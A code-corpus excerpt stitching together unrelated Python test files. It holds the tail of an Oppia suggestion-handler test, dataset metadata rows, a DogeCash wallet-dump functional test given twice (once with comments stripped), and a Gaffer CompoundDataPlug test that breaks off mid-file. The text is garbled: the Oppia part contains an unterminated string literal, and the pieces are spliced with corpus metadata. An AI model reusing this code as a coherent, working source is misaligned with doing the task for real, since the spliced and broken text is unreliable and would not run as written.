'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/add_question')
self.assertEqual(response, {})
def test_question_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_skill_opportunity(self.SKILL_ID)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.SKILL_ID], None)
def test_translation_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_exploration_opportunities([self.EXP_ID])
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.EXP_ID], None)
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/exploration/invalid_suggestion_type',
expected_status_int=400)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
class ReviewableSuggestionsHandlerTest(test_utils.GenericTestBase):
def setUp(self):
super(ReviewableSuggestionsHandlerTest, self).setUp()
self.AUTHOR_EMAIL = 'author@example.com'
self.REVIEWER_EMAIL = 'reviewer@example.com'
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
topic.thumbnail_bg_color = '
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-b')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
user_services.allow_user_to_review_question(self.reviewer_id)
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
# Login and update exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/add_question')
self.assertEqual(response, {})
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/exploration/invalid_suggestion_type',
expected_status_int=404)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
| true
| true
|
1c4484ec00c3b5a988f8610e8065d78bbfbd8918
| 5,672
|
py
|
Python
|
test/functional/wallet_dump.py
|
Nugetzrul3/dogecash
|
f09a4ed70e9ea6f5599c8a20fe255cbe24373cc1
|
[
"MIT"
] | 52
|
2018-10-08T07:17:35.000Z
|
2021-11-29T22:53:08.000Z
|
test/functional/wallet_dump.py
|
Nugetzrul3/dogecash
|
f09a4ed70e9ea6f5599c8a20fe255cbe24373cc1
|
[
"MIT"
] | 50
|
2018-10-20T10:42:54.000Z
|
2021-02-15T21:53:51.000Z
|
test/functional/wallet_dump.py
|
Nugetzrul3/dogecash
|
f09a4ed70e9ea6f5599c8a20fe255cbe24373cc1
|
[
"MIT"
] | 53
|
2018-11-03T16:42:43.000Z
|
2021-12-11T03:55:21.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the dumpwallet RPC."""
import os
from test_framework.test_framework import DogeCashTestFramework
from test_framework.util import (assert_equal, assert_raises_rpc_error)
def read_dump(file_name, addrs, hd_master_addr_old):
"""
Read the given dump, count the addrs that match, count change and reserve.
Also check that the old hd_master is inactive
"""
with open(file_name, encoding='utf8') as inputfile:
found_addr = 0
found_addr_chg = 0
found_addr_rsv = 0
hd_master_addr_ret = None
for line in inputfile:
# only read non comment lines
if line[0] != "#" and len(line) > 10:
# split out some data
key_date_label, comment = line.split("#")
key_date_label = key_date_label.split(" ")
date = key_date_label[1]
keytype = key_date_label[2]
imported_key = date == '1970-01-01T00:00:01Z'
if imported_key:
# Imported keys have multiple addresses, no label (keypath) and timestamp
# Skip them
continue
addr_keypath = comment.split(" addr=")[1]
addr = addr_keypath.split(" ")[0]
keypath = None
if keytype == "hdseed=1":
# ensure we have generated a new hd master key
assert hd_master_addr_old != addr
hd_master_addr_ret = addr
elif keytype == "script=1":
# scripts don't have keypaths
keypath = None
else:
keypath = addr_keypath.rstrip().split("hdkeypath=")[1]
# count key types
for addrObj in addrs:
if addrObj['address'] == addr.split(",")[0] and addrObj['hdkeypath'] == keypath and keytype == "label=":
if addr.startswith('x') or addr.startswith('y'):
# P2PKH address
found_addr += 1
# else: todo: add staking/anonymous addresses here
break
elif keytype == "change=1":
found_addr_chg += 1
break
elif keytype == "reserve=1":
found_addr_rsv += 1
break
return found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_ret
class WalletDumpTest(DogeCashTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [["-keypool=90"]]
self.rpc_timewait = 90
def setup_network(self, split=False):
# Use 1 minute timeout because the initial getnewaddress RPC can take
# longer than the default 30 seconds due to an expensive
# CWallet::TopUpKeyPool call, and the encryptwallet RPC made later in
# the test often takes even longer.
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test (self):
tmpdir = self.options.tmpdir
# generate 20 addresses to compare against the dump
test_addr_count = 20
addrs = []
for i in range(0,test_addr_count):
addr = self.nodes[0].getnewaddress()
vaddr = self.nodes[0].getaddressinfo(addr) # required to get hd keypath
addrs.append(vaddr)
# Should be a no-op:
self.nodes[0].keypoolrefill()
# dump unencrypted wallet
dumpUnencrypted = os.path.join(tmpdir, "node0", "wallet.unencrypted.dump")
result = self.nodes[0].dumpwallet(dumpUnencrypted)
assert_equal(result['filename'], os.path.abspath(dumpUnencrypted))
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_unenc = \
read_dump(dumpUnencrypted, addrs, None)
assert_equal(found_addr, test_addr_count) # all keys must be in the dump
assert_equal(found_addr_chg, 50) # 50 blocks where mined
assert_equal(found_addr_rsv, 90 * 3) # 90 keys external plus 100% internal keys plus 100% staking keys
#encrypt wallet, restart, unlock and dump
self.nodes[0].node_encrypt_wallet('test')
self.start_node(0)
self.nodes[0].walletpassphrase('test', 10)
# Should be a no-op:
self.nodes[0].keypoolrefill()
dumpEncrypted = os.path.join(tmpdir, "node0", "wallet.encrypted.dump")
self.nodes[0].dumpwallet(dumpEncrypted)
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_enc = \
read_dump(dumpEncrypted, addrs, hd_master_addr_unenc)
assert_equal(found_addr, test_addr_count)
assert_equal(found_addr_chg, 90 * 3 + 1 + 50) # old reserve keys are marked as change now. todo: The +1 needs to be removed once this is updated (master seed taken as an internal key)
assert_equal(found_addr_rsv, 90 * 3) # 90 external + 90 internal + 90 staking
# Overwriting should fail
assert_raises_rpc_error(-8, "already exists", self.nodes[0].dumpwallet, dumpUnencrypted)
# Keyword matching should fail
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "debug")
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "wallet.log")
if __name__ == '__main__':
WalletDumpTest().main ()
| 42.646617
| 192
| 0.603491
|
import os
from test_framework.test_framework import DogeCashTestFramework
from test_framework.util import (assert_equal, assert_raises_rpc_error)
def read_dump(file_name, addrs, hd_master_addr_old):
with open(file_name, encoding='utf8') as inputfile:
found_addr = 0
found_addr_chg = 0
found_addr_rsv = 0
hd_master_addr_ret = None
for line in inputfile:
if line[0] != "#" and len(line) > 10:
key_date_label, comment = line.split("#")
key_date_label = key_date_label.split(" ")
date = key_date_label[1]
keytype = key_date_label[2]
imported_key = date == '1970-01-01T00:00:01Z'
if imported_key:
continue
addr_keypath = comment.split(" addr=")[1]
addr = addr_keypath.split(" ")[0]
keypath = None
if keytype == "hdseed=1":
assert hd_master_addr_old != addr
hd_master_addr_ret = addr
elif keytype == "script=1":
keypath = None
else:
keypath = addr_keypath.rstrip().split("hdkeypath=")[1]
# count key types
for addrObj in addrs:
if addrObj['address'] == addr.split(",")[0] and addrObj['hdkeypath'] == keypath and keytype == "label=":
if addr.startswith('x') or addr.startswith('y'):
# P2PKH address
found_addr += 1
# else: todo: add staking/anonymous addresses here
break
elif keytype == "change=1":
found_addr_chg += 1
break
elif keytype == "reserve=1":
found_addr_rsv += 1
break
return found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_ret
class WalletDumpTest(DogeCashTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [["-keypool=90"]]
self.rpc_timewait = 90
def setup_network(self, split=False):
# Use 1 minute timeout because the initial getnewaddress RPC can take
# longer than the default 30 seconds due to an expensive
# CWallet::TopUpKeyPool call, and the encryptwallet RPC made later in
# the test often takes even longer.
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test (self):
tmpdir = self.options.tmpdir
# generate 20 addresses to compare against the dump
test_addr_count = 20
addrs = []
for i in range(0,test_addr_count):
addr = self.nodes[0].getnewaddress()
vaddr = self.nodes[0].getaddressinfo(addr) # required to get hd keypath
addrs.append(vaddr)
# Should be a no-op:
self.nodes[0].keypoolrefill()
# dump unencrypted wallet
dumpUnencrypted = os.path.join(tmpdir, "node0", "wallet.unencrypted.dump")
result = self.nodes[0].dumpwallet(dumpUnencrypted)
assert_equal(result['filename'], os.path.abspath(dumpUnencrypted))
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_unenc = \
read_dump(dumpUnencrypted, addrs, None)
assert_equal(found_addr, test_addr_count) # all keys must be in the dump
assert_equal(found_addr_chg, 50) # 50 blocks where mined
assert_equal(found_addr_rsv, 90 * 3) # 90 keys external plus 100% internal keys plus 100% staking keys
#encrypt wallet, restart, unlock and dump
self.nodes[0].node_encrypt_wallet('test')
self.start_node(0)
self.nodes[0].walletpassphrase('test', 10)
# Should be a no-op:
self.nodes[0].keypoolrefill()
dumpEncrypted = os.path.join(tmpdir, "node0", "wallet.encrypted.dump")
self.nodes[0].dumpwallet(dumpEncrypted)
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_enc = \
read_dump(dumpEncrypted, addrs, hd_master_addr_unenc)
assert_equal(found_addr, test_addr_count)
assert_equal(found_addr_chg, 90 * 3 + 1 + 50) # old reserve keys are marked as change now. todo: The +1 needs to be removed once this is updated (master seed taken as an internal key)
assert_equal(found_addr_rsv, 90 * 3) # 90 external + 90 internal + 90 staking
# Overwriting should fail
assert_raises_rpc_error(-8, "already exists", self.nodes[0].dumpwallet, dumpUnencrypted)
# Keyword matching should fail
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "debug")
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "wallet.log")
if __name__ == '__main__':
WalletDumpTest().main ()
| true
| true
|
1c4485f443652f42f9ae85bde81f45cc658539e0
| 16,941
|
py
|
Python
|
python/GafferTest/CompoundDataPlugTest.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferTest/CompoundDataPlugTest.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferTest/CompoundDataPlugTest.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import imath
import IECore
import Gaffer
import GafferTest
class CompoundDataPlugTest( GafferTest.TestCase ) :
def test( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.IntData( 10 ), "member1" )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
self.assertEqual( m1.getName(), "member1" )
self.assertEqual( m1["name"].getValue(), "a" )
self.assertEqual( m1["value"].getValue(), 10 )
self.failIf( "enabled" in m1 )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.IntData( 10 ) )
self.assertEqual( n, "a" )
m1["name"].setValue( "b" )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.IntData( 10 ) )
self.assertEqual( n, "b" )
m2 = Gaffer.NameValuePlug( "c", IECore.FloatData( .5 ), "member1" )
p.addChild( m2 )
self.failUnless( isinstance( m2, Gaffer.ValuePlug ) )
self.assertEqual( m2.getName(), "member2" )
self.assertEqual( m2["name"].getValue(), "c" )
self.assertEqual( m2["value"].getValue(), .5 )
self.failIf( "enabled" in m2 )
d, n = p.memberDataAndName( m2 )
self.assertEqual( d, IECore.FloatData( .5 ) )
self.assertEqual( n, "c" )
m3 = Gaffer.NameValuePlug( "o", IECore.StringData( "--" ), True, name = "m" )
p.addChild( m3 )
self.failUnless( isinstance( m3, Gaffer.ValuePlug ) )
self.assertEqual( m3.getName(), "m" )
self.assertEqual( m3["name"].getValue(), "o" )
self.assertEqual( m3["value"].getValue(), "--" )
self.failUnless( "enabled" in m3 )
self.assertEqual( m3["enabled"].getValue(), True )
d, n = p.memberDataAndName( m3 )
self.assertEqual( d, IECore.StringData( "--" ) )
self.assertEqual( n, "o" )
m3["enabled"].setValue( False )
d, n = p.memberDataAndName( m3 )
self.assertEqual( d, None )
self.assertEqual( n, "" )
# test if creating a plug from data that has a geometric
# interpretation specified transfers that interpretation to the plug
m4 = Gaffer.NameValuePlug( "vector", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Vector ), True, name = "vector" )
p.addChild( m4 )
self.assertEqual( m4["value"].interpretation(), IECore.GeometricData.Interpretation.Vector )
def testVectorData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.FloatVectorData( [ 1, 2, 3 ] ) )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.FloatVectorData( [ 1, 2, 3 ] ) )
self.assertEqual( n, "a" )
m2 = Gaffer.NameValuePlug( "b", IECore.IntVectorData( [ 1, 2, 3 ] ) )
p.addChild( m2 )
self.failUnless( isinstance( m2, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m2 )
self.assertEqual( d, IECore.IntVectorData( [ 1, 2, 3 ] ) )
self.assertEqual( n, "b" )
m3 = Gaffer.NameValuePlug( "c", IECore.StringVectorData( [ "1", "2", "3" ] ) )
p.addChild( m3 )
self.failUnless( isinstance( m3, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m3 )
self.assertEqual( d, IECore.StringVectorData( [ "1", "2", "3" ] ) )
self.assertEqual( n, "c" )
m4 = Gaffer.NameValuePlug( "d", IECore.V3fVectorData( [ imath.V3f( x ) for x in range( 1, 5 ) ] ) )
p.addChild( m4 )
self.failUnless( isinstance( m4, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m4 )
self.assertEqual( d, IECore.V3fVectorData( [ imath.V3f( x ) for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "d" )
m5 = Gaffer.NameValuePlug( "e", IECore.Color3fVectorData( [ imath.Color3f( x ) for x in range( 1, 5 ) ] ) )
p.addChild( m5 )
self.failUnless( isinstance( m5, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m5 )
self.assertEqual( d, IECore.Color3fVectorData( [ imath.Color3f( x ) for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "e" )
m6 = Gaffer.NameValuePlug( "f", IECore.M44fVectorData( [ imath.M44f() * x for x in range( 1, 5 ) ] ) )
p.addChild( m6 )
self.failUnless( isinstance( m6, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m6 )
self.assertEqual( d, IECore.M44fVectorData( [ imath.M44f() * x for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "f" )
m7 = Gaffer.NameValuePlug( "d", IECore.V2iVectorData( [ imath.V2i( x ) for x in range( 1, 5 ) ] ) )
p.addChild( m7 )
self.failUnless( isinstance( m7, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m7 )
self.assertEqual( d, IECore.V2iVectorData( [ imath.V2i( x ) for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "d" )
def testImathVectorData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
self.assertEqual( n, "a" )
m2 = Gaffer.NameValuePlug( "b", IECore.V2fData( imath.V2f( 1, 2 ) ) )
p.addChild( m2 )
self.failUnless( isinstance( m2, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m2 )
self.assertEqual( d, IECore.V2fData( imath.V2f( 1, 2 ) ) )
self.assertEqual( n, "b" )
def testImathMatrixData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.M44fData( imath.M44f( *range(16) ) ) )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.M44fData( imath.M44f( *range(16) ) ) )
self.assertEqual( n, "a" )
def testTransformPlugData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", Gaffer.TransformPlug() )
p.addChild( m1 )
m1["value"]["translate"].setValue( imath.V3f( 1,2,3 ) )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.M44fData( imath.M44f(
1, 0, 0, 0,
0, 1, 0, 0,
0, 0, 1, 0,
1, 2, 3, 1,
) ) )
self.assertEqual( n, "a" )
def testPlugFlags( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
p.addChild( m1 )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m1["name"].getFlags(), Gaffer.Plug.Flags.Default)
self.assertEqual( m1["value"].getFlags(), Gaffer.Plug.Flags.Default )
m2 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), True )
p.addChild( m2 )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["name"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["value"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["enabled"].getFlags(), Gaffer.Plug.Flags.Default )
def testCreateCounterpart( self ) :
p1 = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), "member1" )
p1.addChild( m1 )
p2 = p1.createCounterpart( "c", Gaffer.Plug.Direction.Out )
self.assertEqual( p2.typeName(), p1.typeName() )
self.assertEqual( p2.getName(), "c" )
self.assertEqual( p2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( len( p2 ), len( p1 ) )
self.assertEqual( p2.getFlags(), p1.getFlags() )
m2 = p2["member1"]
self.assertEqual( m2.typeName(), m1.typeName() )
self.assertEqual( m2.getFlags(), m1.getFlags() )
self.assertEqual( m2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( m2.keys(), m1.keys() )
def testCreateWithValuePlug( self ) :
p = Gaffer.CompoundDataPlug()
v = Gaffer.IntPlug( minValue = -10, maxValue = 10, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
m1 = Gaffer.NameValuePlug( "a", v )
p.addChild( m1 )
self.assertTrue( v.parent().isSame( m1 ) )
self.assertEqual( m1["value"].getName(), "value" )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.assertEqual( p.memberDataAndName( m1 ), ( IECore.IntData( 0 ), "a" ) )
v2 = Gaffer.IntPlug( defaultValue = 5, minValue = -10, maxValue = 10 )
m2 = Gaffer.NameValuePlug( "b", v2, True, name = "blah" )
p.addChild( m2 )
self.assertTrue( v2.parent().isSame( m2 ) )
self.assertEqual( m2["value"].getName(), "value" )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( p.memberDataAndName( m2 ), ( IECore.IntData( 5 ), "b" ) )
def testAdditionalChildrenRejected( self ) :
p = Gaffer.CompoundDataPlug()
self.assertRaises( RuntimeError, p.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, p.addChild, Gaffer.Plug() )
m = Gaffer.NameValuePlug( "a", IECore.IntData( 10 ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, m.addChild, Gaffer.StringPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "value" ) )
def testSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s["n"]["p"].addChild( Gaffer.NameValuePlug( "a", IECore.IntData( 10 ), "a", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual(
s["n"]["p"].memberDataAndName( s["n"]["p"]["a"] ),
s2["n"]["p"].memberDataAndName( s2["n"]["p"]["a"] ),
)
def testAddMembers( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
self.assertEqual( len( p ), 2 )
